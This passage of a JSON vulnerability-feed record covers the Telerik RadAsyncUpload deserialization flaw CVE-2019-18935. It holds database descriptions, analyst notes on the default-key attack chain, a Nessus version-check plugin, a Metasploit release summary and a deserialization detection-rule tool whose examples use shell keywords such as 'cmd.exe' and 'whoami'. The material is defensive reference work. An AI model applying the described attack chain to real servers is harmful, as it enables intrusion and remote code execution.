"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-07-06T15:01:00", "type": "impervablog", "title": "Australian Cyber Attack Vectors Blocked Out of the Box by Imperva WAF", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935", "CVE-2019-19781"], "modified": "2020-07-06T15:01:00", "id": "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D", "href": "https://www.imperva.com/blog/australian-cyber-attack-vectors-blocked-out-of-the-box-by-imperva-cloud-waf/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T22:05:34", "description": "Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. 
In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-11T13:15:00", "type": "cve", "title": "CVE-2019-18935", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2019-18935"], "modified": "2020-10-20T22:15:00", "cpe": [], "id": "CVE-2019-18935", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-18935", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "attackerkb": [{"lastseen": "2022-01-18T20:32:04", "description": "Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. 
In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)\n\n \n**Recent assessments:** \n \n**zeroSteiner** at February 05, 2020 6:37pm UTC reported:\n\nThis vulnerability originally outlined by [bishopfox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>) is a variation on CVE-2017-11317. The patch for CVE-2017-11317 introduced encryption on the object which prevents an attacker from modifying the object in such a way to achieve file upload as the original did. This mitigation, however uses a default value for the encryption key of `PrivateKeyForEncryptionOfRadAsyncUploadConfiguration` that if left unchanged can be used to encrypt an object to reproduce similar conditions to CVE-2017-11317. With the ability to upload an arbitrary file, a Mixed Mode Assembly can be uploaded to achieve RCE through the deserializeation functionality in `JavaScriptSerializer.\n\nUsers should change their encryption key (as [recommended](<https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?_ga=2.98618715.414867971.1580929998-674280231.1580929998>) by Telerik) to a strong password and restart their server to mitigate this vulnerability. At that point an attacker would have to recover that secret value to leverage this attack chain. Versions after and including R2 2017 SP1 are not configured with a default encryption key, making exploiting this dependent on recovering the key through another means.\n\nMitigation Strength set to 3/5 due to it being dependent on the strength of the password.\n\n**ccondon-r7** at October 13, 2020 4:47pm UTC reported:\n\nThis vulnerability originally outlined by [bishopfox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>) is a variation on CVE-2017-11317. 
The patch for CVE-2017-11317 introduced encryption on the object which prevents an attacker from modifying the object in such a way to achieve file upload as the original did. This mitigation, however, uses a default value for the encryption key of `PrivateKeyForEncryptionOfRadAsyncUploadConfiguration` that if left unchanged can be used to encrypt an object to reproduce similar conditions to CVE-2017-11317. With the ability to upload an arbitrary file, a Mixed Mode Assembly can be uploaded to achieve RCE through the deserialization functionality in `JavaScriptSerializer`.\n\nUsers should change their encryption key (as [recommended](<https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?_ga=2.98618715.414867971.1580929998-674280231.1580929998>) by Telerik) to a strong password and restart their server to mitigate this vulnerability. At that point an attacker would have to recover that secret value to leverage this attack chain. Versions after and including R2 2017 SP1 are not configured with a default encryption key, making exploiting this dependent on recovering the key through another means.\n\nMitigation Strength set to 3/5 due to it being dependent on the strength of the password.\n\n**gwillcox-r7** at October 20, 2020 6:59pm UTC reported:\n\nThis vulnerability originally outlined by [bishopfox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>) is a variation on CVE-2017-11317. The patch for CVE-2017-11317 introduced encryption on the object which prevents an attacker from modifying the object in such a way to achieve file upload as the original did. This mitigation, however, uses a default value for the encryption key of `PrivateKeyForEncryptionOfRadAsyncUploadConfiguration` that if left unchanged can be used to encrypt an object to reproduce similar conditions to CVE-2017-11317. 
With the ability to upload an arbitrary file, a Mixed Mode Assembly can be uploaded to achieve RCE through the deserialization functionality in `JavaScriptSerializer`.\n\nUsers should change their encryption key (as [recommended](<https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?_ga=2.98618715.414867971.1580929998-674280231.1580929998>) by Telerik) to a strong password and restart their server to mitigate this vulnerability. At that point an attacker would have to recover that secret value to leverage this attack chain. Versions after and including R2 2017 SP1 are not configured with a default encryption key, making exploiting this dependent on recovering the key through another means.\n\nMitigation Strength set to 3/5 due to it being dependent on the strength of the password.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4\nAssessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-12-11T00:00:00", "type": "attackerkb", "title": "CVE-2019-18935", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2019-18935"], "modified": 
"2021-07-27T00:00:00", "id": "AKB:90DDDBF9-EA58-4470-B821-C35007A64BD6", "href": "https://attackerkb.com/topics/ZA24eUeDg5/cve-2019-18935", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-04-12T16:58:24", "description": "Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-04-24T00:00:00", "type": "nessus", "title": "Telerik UI for ASP.NET AJAX RadAsyncUpload .NET Deserialization Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2019-18935"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:telerik:ui_for_asp.net_ajax"], "id": "TELERIK_UI_FOR_ASPNET_AJAX_CVE-2019-18935.NASL", "href": "https://www.tenable.com/plugins/nessus/135970", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135970);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2019-18935\");\n script_xref(name:\"IAVA\", value:\"2020-A-0219\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Telerik UI for ASP.NET AJAX RadAsyncUpload .NET Deserialization Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application development suite installed on the remote Windows\nhost is affected by a 
deserialization vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability \nin the RadAsyncUpload function. This is exploitable when the encryption keys are known due to \nthe presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result \nin remote code execution. (As of 2020.1.114, a default setting prevents the exploit. \nIn 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)\");\n # https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?de2ce6ef\");\n # https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?&_ga=2.224762457.29387225.1587722153-1707628900.1586272484#allowedcustommetadatatypes\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?be6fd178\");\n # https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?57e10c1e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Telerik UI for ASP.NET AJAX version R3 2019 SP1\n(2019.3.1023) or later, and enable the type whitelisting feature of RadAsyncUpload.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-18935\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", 
value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:telerik:ui_for_asp.net_ajax\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"telerik_ui_for_aspnet_ajax_installed.nbin\");\n script_require_keys(\"installed_sw/Telerik UI for ASP.NET AJAX\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('install_func.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\n\nvar app_name = 'Telerik UI for ASP.NET AJAX';\nvar opt_in = FALSE;\nvar install = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\n\nvar version = install['version'];\nvar path = install['path'];\n\n# 2010.1.309 and earlier not affected \nif (ver_compare(ver:version, fix:'2010.1.309.0', strict:FALSE) <= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, path);\n\n# 2020.1.114 and later have default settings available\nif (ver_compare(ver:version, fix:'2020.1.114.0', strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, path);\n\n# 2019.3.1023 has opt-in settings available, but not by default\nif ((ver_compare(ver:version, fix:'2019.3.1023', strict:FALSE) >= 0) &&\n (ver_compare(ver:version, fix:'2020.1.114.0', strict:FALSE) <= 0))\n{\n opt_in = TRUE;\n}\n\nif (opt_in)\n{\n # if version is 2019.3.1023 or higher, but lower than 2020.1.114.0, \n # type whitelisting 
feature of RadAsyncUpload needs to be enabled manually.\n # so if we're paranoid, we add a note to the report\n # (done below) and if we're not paranoid, we audit out\n if (report_paranoia < 2) audit(AUDIT_PARANOID);\n}\n\nvar port = get_kb_item('SMB/transport');\nif (empty_or_null(port))\n port = 445;\n\nvar report = report_items_str(\n report_items:make_array(\n 'Path', path,\n 'Installed version', version,\n 'Fixed version', '2019.3.1023'\n ),\n ordered_fields:make_list('Path', 'Installed version', 'Fixed version')\n);\n\nif (opt_in)\n report += '\\n\\n' + 'Although the type whitelisting feature of RadAsyncUpload is available for this version,' +\n '\\n' + 'we are not able to determine if this is actually enabled. Following the advisory,' +\n '\\n' + 'you should ensure that this is the case.';\n\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-14T16:20:54", "description": "According to its self-reported version number, the version of Telerik UI for ASP.NET AJAX prior to 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. As of 2020.1.114, a default setting prevents the exploit. 
In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-07-01T00:00:00", "type": "nessus", "title": "Telerik UI for ASP.NET AJAX RadAsyncUpload .NET Deserialization Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2019-18935"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:telerik:ui_for_asp.net_ajax:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112521", "href": "https://www.tenable.com/plugins/was/112521", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2020-10-28T04:47:53", "description": "\n\nMetasploit keeping that developer awareness rate up.\n\n\n\nThanks to [mr_me](<https://github.com/stevenseeley>) & [wvu](<https://github.com/wvu-r7>), SharePoint is an even better target to find in your next penetration test. The newly minted module can net you a shell and a copy of the servers config, making that report oh so much more fun.\n\nLike to escape the sandbox? WizardOpium has your first taste of freedom. 
Brought to you by [timwr](<https://github.com/timwr>) and friends through Chrome, [this module](<https://github.com/rapid7/metasploit-framework/blob/4fb0c4ac8ab89575c4358d2369d3650bc3e1c10d/modules/exploits/multi/browser/chrome_object_create.rb>) might be that push you need to get out onto solid ground.\n\n## New modules (4)\n\n * [Login to Another User with Su on Linux / Unix Systems](<https://github.com/rapid7/metasploit-framework/pull/14179>) by [Gavin Youker](<https://github.com/youkergav>)\n * [Microsoft SharePoint Server-Side Include and ViewState RCE](<https://github.com/rapid7/metasploit-framework/pull/14265>) by [wvu](<https://github.com/wvu-r7>) and [mr_me](<https://github.com/stevenseeley>), which exploits [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>)\n * [Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization](<https://github.com/rapid7/metasploit-framework/pull/14229>) by [Alvaro Mu\u00f1oz](<https://github.com/pwntester>), [Caleb Gross](<https://github.com/noperator>), [Markus Wulftange](<https://github.com/mwulftange>), [Oleksandr Mirosh](<https://twitter.com/olekmirosh>), [Paul Taylor](<https://github.com/bao7uo>), [Spencer McIntyre](<https://github.com/zeroSteiner>), and [straightblast](<https://github.com/straightblast>), which exploits [CVE-2019-18935](<https://attackerkb.com/topics/ZA24eUeDg5/cve-2019-18935?referrer=wrapup>)\n * [Microsoft Windows Uninitialized Variable Local Privilege Elevation](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [piotrflorczyk](<https://github.com/piotrflorczyk>), [timwr](<https://github.com/timwr>), and [unamer](<https://github.com/unamer>), which exploits [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>)\n\n## Enhancements and features\n\n * [Add version check to exchange_ecp_dlp_policy](<https://github.com/rapid7/metasploit-framework/pull/14289>) by 
[wvu](<https://github.com/wvu-r7>) adds extended version checks for SharePoint and Exchange servers as used by the exploit modules for [CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?referrer=wrapup>) and [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>).\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) improves commands executed during `apk` generation commands to be more explicit with options.\n * [More improved doc and syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. As always docs improvement are greatly appreciated!\n * [Add tab completion for `run` command](<https://github.com/rapid7/metasploit-framework/pull/14240>) by [cgranleese-r7](<https://github.com/cgranleese-r7>) adds tab completion for specifying inline options when using the `run` command. For example, within Metasploit's console typing `run` and then hitting the tab key twice will now show all available option names. 
Incomplete option names and values can also be suggested, for example `run LHOST=` and then hitting the tab key twice will show all available LHOST values.\n * [CVE-2019-1458 chrome sandbox escape](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [timwr](<https://github.com/timwr>) adds support for exploiting [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>), aka WizardOpium, as both a standalone LPE module, and as a sandbox escape option for the `exploit/multi/browser/chrome_object_create.rb` module that exploits [CVE-2018-17463](<https://attackerkb.com/topics/fgJVNLkV6f/cve-2018-17463?referrer=wrapup>) in Chrome, thereby allowing users to both elevate their privileges on affected versions of Windows, as well as potentially execute a full end to end attack chain to go from a malicious web page to SYSTEM on systems running vulnerable versions of Chrome and Windows.\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) improves commands executed during `apk` generation commands to be more explicit with options.\n * [More improved doc and syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. 
As always, docs improvements are greatly appreciated!\n\n## Bugs fixed\n\n * [MS17-010 improvements for SMB1 clients](<https://github.com/rapid7/metasploit-framework/pull/14290>) by [Spencer McIntyre](<https://github.com/zeroSteiner>) fixes an issue with the exploit/windows/smb/ms17_010_eternalblue module that was preventing sessions from being obtained successfully.\n * [Fix missing TLV migration from strings -> ints](<https://github.com/rapid7/metasploit-payloads/pull/441>) by [Justin Steven](<https://github.com/justinsteven>) converts a missed TLV conversion for COMMAND_ID_CORE_CHANNEL_CLOSE for PHP payloads.\n * [Meterpreter endless loop](<https://github.com/rapid7/metasploit-payloads/pull/439>) by [vixfwis](<https://github.com/vixfwis>), ensured that Meterpreter can properly handle SOCKET_ERROR on recv.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-10-13T14%3A57%3A09-05%3A00..2020-10-22T09%3A00%3A02-05%3A00%22>)\n * [Full diff 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/compare/6.0.11...6.0.12>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2020-10-23T18:56:55", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-17463", "CVE-2019-1458", "CVE-2019-18935", "CVE-2020-16875", "CVE-2020-16952"], "modified": "2020-10-23T18:56:55", "id": "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D", "href": "https://blog.rapid7.com/2020/10/23/metasploit-wrap-up-84/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2022-05-12T21:31:10", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh96iyLi-WJuKHxzsUe2ew0LLbVkwXkKoWXWpcZ0mRX6YUdBo7uzVq0lxIihLA9awRncMpRG3Pz54Becx4VdqrQLs5gSE0N0eXTFeY3SvASRKmLUj29WSoNXUB9oiczpcdLkgyqQmTBmYpjyy432kXPM87zwjhA7s0hfpa0u5aqBPpNFNzCyggYVI4E/s1882/deserialization1.png>)\n\n \n\n\nProgrammatically create hunting rules for deserialization [exploitation](<https://www.kitploit.com/search/label/Exploitation> \"exploitation\" ) with multiple\n\n * keywords (e.g. cmd.exe)\n * gadget chains (e.g. CommonsCollection)\n * object types (e.g. ViewState, Java, Python Pickle, PHP)\n * encodings (e.g. Base64, raw)\n * rule types (e.g. Snort, Yara)\n\n \n\n\n### Disclaimer\n\nRules generated by this tool are intended for hunting/research purposes and are not designed for high fidelity/blocking purposes.\n\nPlease _test thoroughly_ before deploying to any production systems.\n\nThe Yara rules are primarily intended for scanning web server logs. Some of the \"object prefixes\" are only 2 bytes long, so they can make large scans a bit slow. 
_(Translation: please don't drop them all into VT Retrohunt.)_\n\n### Usage\n\nHelp: `python3 heyserial.py -h`\n\nExamples:\n \n \n python3 heyserial.py -c 'ExampleChain::condition1+condition2' -t JavaObj python3 heyserial.py -k cmd.exe whoami 'This file cannot be run in DOS mode' python3 heyserial.py -k Process.Start -t NETViewState -e base64 \"base64+utf16le\" \n\n# Utils\n\n### utils/checkyoself.py\n\nThis is a tool to automate bulk testing of Snort and Yara rules on a variety of sample files.\n\nUsage: `python3 checkyoself.py [-y rules.yara] [-s rules.snort] [-o file_output_prefix] [--matches] [--misses] -d malware.exe malware.pcap`\n\nExamples: `python3 checkyoself.py -y rules/javaobj -s rules/javaobj -d payloads/javaobj pcaps --misses -o java_misses`\n\n### utils/generate_payloads.ps1\n\nYSoSerial.NET v1.34 payload generation. Run on Windows from the ./utils directory.\n\n * Source: <https://github.com/pwntester/ysoserial.net>\n * License: ysoserial.net_LICENSE.txt\n\n### utils/generate_payloads.sh\n\nYSoSerial payload generation. Run on Linux from the ./utils directory.\n\n * Source: <https://github.com/frohoff/ysoserial>\n * License: ysoserial_LICENSE.txt\n\n### utils/install_snort.sh\n\nInstalling Snort on a Debian based system was a bit finicky for me, so I wrote my install notes here.\n\n_Use at your own risk_ in a VM that _you have snapshotted recently_.\n\n### utils/server.py\n\nSimple Python script that runs an HTTP server on 127.0.0.1:12345 and accepts POST requests.\n\nHandy for generating test PCAPs.\n\n# License\n\nCopyright (C) 2021 Alyssa Rahman, Mandiant, Inc. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. 
You may obtain a copy of the License at: [package root]/LICENSE.txt Unless required by applicable law or agreed to in writing, software [distributed](<https://www.kitploit.com/search/label/Distributed> \"distributed\" ) under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n\n# Contributing\n\nCheck out the Developers' guide (DEVELOPERS.md) for more details on extending HeySerial!\n\n# Prior Work/Related Resources\n\nTools\n\n * [Deserialization-Cheat-Sheet](<https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet> \"Deserialization-Cheat-Sheet\" ) \u2013 @GrrrDog\n * [Ysoserial](<https://github.com/frohoff/ysoserial> \"Ysoserial\" ) \\- @frohoff\n * [MarshalSec](<https://github.com/frohoff/marshalsec> \"MarshalSec\" ) \\- @frohoff\n * [Ysoserial (forked)](<https://github.com/wh1t3p1g/ysoserial> \"Ysoserial \\(forked\\)\" ) \\- @wh1t3p1g\n * [Ysoserial.NET](<https://github.com/pwntester/ysoserial.net> \"Ysoserial.NET\" ) and [v2 branch](<https://github.com/pwntester/ysoserial.net/tree/v2> \"v2 branch\" ) \\- @pwntester\n * [ViewGen](<https://github.com/0xacb/viewgen> \"ViewGen\" ) \u2013 0xacb\n * [Rogue-JNDI](<https://github.com/veracode-research/rogue-jndi> \"Rogue-JNDI\" ) \\- @veracode-research\n\nVulnerabilities\n\n * Log4J ([CVE-2021-44228](<https://www.lunasec.io/docs/blog/log4j-zero-day/> \"CVE-2021-44228\" ))\n * Exchange ([CVE-2021-42321](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42321> \"CVE-2021-42321\" ))\n * Zoho ManageEngine ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189> \"CVE-2020-10189\" ))\n * Jira ([CVE-2020-36239](<https://oxalis.io/atlassian-jira-data-centers-critical-vulnerability-what-you-need-to-know/> \"CVE-2020-36239\" ))\n * Telerik ([CVE-2019-18935](<https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui> 
\"CVE-2019-18935\" ))\n * C1 CMS ([CVE-2019-18211](<https://medium.com/@frycos/yet-another-net-deserialization-35f6ce048df7> \"CVE-2019-18211\" ))\n * Jenkins ([CVE-2016-9299](<https://nvd.nist.gov/vuln/detail/CVE-2016-9299> \"CVE-2016-9299\" ))\n * [What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.](<https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/> \"What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.\" ) \u2013 @breenmachine, FoxGloveSecurity (2015)\n\nTalks and Write-Ups\n\n * [PSA: Log4Shell and the current state of JNDI injection](<https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/> \"PSA: Log4Shell and the current state of JNDI injection\" ) \\- Moritz Bechler (2021)\n * [This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits](<https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits> \"This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits\" ) \u2013 Chris Glyer, Dan Perez, Sarah Jones, Steve Miller (2020)\n * [Deep Dive into .NET ViewState deserialization and its exploitation](<https://swapneildash.medium.com/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817> \"Deep Dive into .NET ViewState deserialization and its exploitation\" ) \u2013 Swapneil Dash (2019)\n * [Exploiting ](<https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/> \"Exploiting\" )[Deserialization](<https://www.kitploit.com/search/label/Deserialization> \"Deserialization\" ) in ASP.NET via ViewState \u2013 Soroush Dalili (2019)\n * [Use of Deserialization in .NET Framework Methods and Classes](<https://research.nccgroup.com/wp-content/uploads/2020/07/whitepaper-new.pdf> \"Use of 
